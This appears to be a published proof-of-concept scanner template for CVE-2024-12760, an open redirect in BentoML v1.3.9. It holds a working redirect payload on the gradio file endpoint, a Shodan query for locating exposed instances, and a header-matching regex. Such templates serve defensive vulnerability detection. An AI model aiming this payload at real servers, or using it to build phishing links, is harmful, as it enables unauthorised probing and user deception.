An open redirect vulnerability exists in BentoML v1.3.9, where the file parameter in the /ui/gradio_api/file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
PoC代码[已公开]
id: CVE-2024-12760
info:
name: BentoML v1.3.9 - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
An open redirect vulnerability exists in BentoML v1.3.9, where the file parameter in the /ui/gradio_api/file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
reference:
- https://huntr.com/bounties/2a284ff6-cc6c-4a10-b72e-1bb31c842bca
metadata:
verified: true
max-request: 1
shodan-query: html:"BentoML"
tags: cve,cve2024,gradio,redirect,oss,bentoml
http:
- method: GET
path:
- "{{BaseURL}}/ui/gradio_api/file=https://oast.me"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a00473045022049b538aa28a4fdc688368253e38827a963fe7eef88713330c4053ada3de0270302210080f7dea1dfb89be811ce7e6ab91f425c7ae008996ef4619860192cf18790638c:922c64590222798bb761d5b6d8e72950